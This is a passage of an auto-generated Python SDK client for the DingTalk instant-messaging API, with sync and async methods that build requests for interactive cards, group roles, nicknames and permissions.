body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxCloseResponse(),
self.do_roarequest('TopboxClose', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/close', 'none', req, runtime)
)
async def topbox_close_with_options_async(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
headers: dingtalkim__1__0_models.TopboxCloseHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxCloseResponse(),
await self.do_roarequest_async('TopboxClose', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/close', 'none', req, runtime)
)
def update_interactive_card(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateInteractiveCardHeaders()
return self.update_interactive_card_with_options(request, headers, runtime)
async def update_interactive_card_async(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateInteractiveCardHeaders()
return await self.update_interactive_card_with_options_async(request, headers, runtime)
def update_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
headers: dingtalkim__1__0_models.UpdateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.card_options):
body['cardOptions'] = request.card_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateInteractiveCardResponse(),
self.do_roarequest('UpdateInteractiveCard', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/interactiveCards', 'json', req, runtime)
)
async def update_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
headers: dingtalkim__1__0_models.UpdateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.card_options):
body['cardOptions'] = request.card_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateInteractiveCardResponse(),
await self.do_roarequest_async('UpdateInteractiveCard', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/interactiveCards', 'json', req, runtime)
)
def update_group_sub_admin(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupSubAdminHeaders()
return self.update_group_sub_admin_with_options(request, headers, runtime)
async def update_group_sub_admin_async(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupSubAdminHeaders()
return await self.update_group_sub_admin_with_options_async(request, headers, runtime)
def update_group_sub_admin_with_options(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
headers: dingtalkim__1__0_models.UpdateGroupSubAdminHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_ids):
body['userIds'] = request.user_ids
if not UtilClient.is_unset(request.role):
body['role'] = request.role
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupSubAdminResponse(),
self.do_roarequest('UpdateGroupSubAdmin', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/subAdmins', 'json', req, runtime)
)
async def update_group_sub_admin_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
headers: dingtalkim__1__0_models.UpdateGroupSubAdminHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_ids):
body['userIds'] = request.user_ids
if not UtilClient.is_unset(request.role):
body['role'] = request.role
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupSubAdminResponse(),
await self.do_roarequest_async('UpdateGroupSubAdmin', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/subAdmins', 'json', req, runtime)
)
def query_members_of_group_role(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders()
return self.query_members_of_group_role_with_options(request, headers, runtime)
async def query_members_of_group_role_async(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders()
return await self.query_members_of_group_role_with_options_async(request, headers, runtime)
def query_members_of_group_role_with_options(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
headers: dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.open_role_id):
body['openRoleId'] = request.open_role_id
if not UtilClient.is_unset(request.timestamp):
body['timestamp'] = request.timestamp
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse(),
self.do_roarequest('QueryMembersOfGroupRole', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/roles/members/query', 'json', req, runtime)
)
async def query_members_of_group_role_with_options_async(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
headers: dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.open_role_id):
body['openRoleId'] = request.open_role_id
if not UtilClient.is_unset(request.timestamp):
body['timestamp'] = request.timestamp
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse(),
await self.do_roarequest_async('QueryMembersOfGroupRole', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/roles/members/query', 'json', req, runtime)
)
def update_member_group_nick(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateMemberGroupNickHeaders()
return self.update_member_group_nick_with_options(request, headers, runtime)
async def update_member_group_nick_async(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateMemberGroupNickHeaders()
return await self.update_member_group_nick_with_options_async(request, headers, runtime)
def update_member_group_nick_with_options(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
headers: dingtalkim__1__0_models.UpdateMemberGroupNickHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.group_nick):
body['groupNick'] = request.group_nick
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateMemberGroupNickResponse(),
self.do_roarequest('UpdateMemberGroupNick', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupNicks', 'json', req, runtime)
)
async def update_member_group_nick_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
headers: dingtalkim__1__0_models.UpdateMemberGroupNickHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.group_nick):
body['groupNick'] = request.group_nick
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateMemberGroupNickResponse(),
await self.do_roarequest_async('UpdateMemberGroupNick', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupNicks', 'json', req, runtime)
)
def get_interconnection_url(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetInterconnectionUrlHeaders()
return self.get_interconnection_url_with_options(request, headers, runtime)
async def get_interconnection_url_async(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetInterconnectionUrlHeaders()
return await self.get_interconnection_url_with_options_async(request, headers, runtime)
def get_interconnection_url_with_options(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
headers: dingtalkim__1__0_models.GetInterconnectionUrlHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.app_user_id):
body['appUserId'] = request.app_user_id
if not UtilClient.is_unset(request.app_user_name):
body['appUserName'] = request.app_user_name
if not UtilClient.is_unset(request.app_user_avatar):
body['appUserAvatar'] = request.app_user_avatar
if not UtilClient.is_unset(request.app_user_avatar_type):
body['appUserAvatarType'] = request.app_user_avatar_type
if not UtilClient.is_unset(request.app_user_mobile_number):
body['appUserMobileNumber'] = request.app_user_mobile_number
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_user_id):
body['dingUserId'] = request.ding_user_id
if not UtilClient.is_unset(request.msg_page_setting_id):
body['msgPageSettingId'] = request.msg_page_setting_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetInterconnectionUrlResponse(),
self.do_roarequest('GetInterconnectionUrl', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interconnections/sessions/urls', 'json', req, runtime)
)
async def get_interconnection_url_with_options_async(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
headers: dingtalkim__1__0_models.GetInterconnectionUrlHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.app_user_id):
body['appUserId'] = request.app_user_id
if not UtilClient.is_unset(request.app_user_name):
body['appUserName'] = request.app_user_name
if not UtilClient.is_unset(request.app_user_avatar):
body['appUserAvatar'] = request.app_user_avatar
if not UtilClient.is_unset(request.app_user_avatar_type):
body['appUserAvatarType'] = request.app_user_avatar_type
if not UtilClient.is_unset(request.app_user_mobile_number):
body['appUserMobileNumber'] = request.app_user_mobile_number
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_user_id):
body['dingUserId'] = request.ding_user_id
if not UtilClient.is_unset(request.msg_page_setting_id):
body['msgPageSettingId'] = request.msg_page_setting_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetInterconnectionUrlResponse(),
await self.do_roarequest_async('GetInterconnectionUrl', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interconnections/sessions/urls', 'json', req, runtime)
)
def send_template_interactive_card(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders()
return self.send_template_interactive_card_with_options(request, headers, runtime)
async def send_template_interactive_card_async(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders()
return await self.send_template_interactive_card_with_options_async(request, headers, runtime)
def send_template_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.callback_url):
body['callbackUrl'] = request.callback_url
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendTemplateInteractiveCardResponse(),
self.do_roarequest('SendTemplateInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/templates/send', 'json', req, runtime)
)
async def send_template_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.callback_url):
body['callbackUrl'] = request.callback_url
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendTemplateInteractiveCardResponse(),
await self.do_roarequest_async('SendTemplateInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/templates/send', 'json', req, runtime)
)
def update_group_permission(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupPermissionHeaders()
return self.update_group_permission_with_options(request, headers, runtime)
async def update_group_permission_async(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupPermissionHeaders()
return await self.update_group_permission_with_options_async(request, headers, runtime)
def update_group_permission_with_options(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
headers: dingtalkim__1__0_models.UpdateGroupPermissionHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.permission_group):
body['permissionGroup'] = request.permission_group
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupPermissionResponse(),
self.do_roarequest('UpdateGroupPermission', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/permissions', 'json', req, runtime)
)
async def update_group_permission_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
headers: dingtalkim__1__0_models.UpdateGroupPermissionHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.permission_group):
body['permissionGroup'] = request.permission_group
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
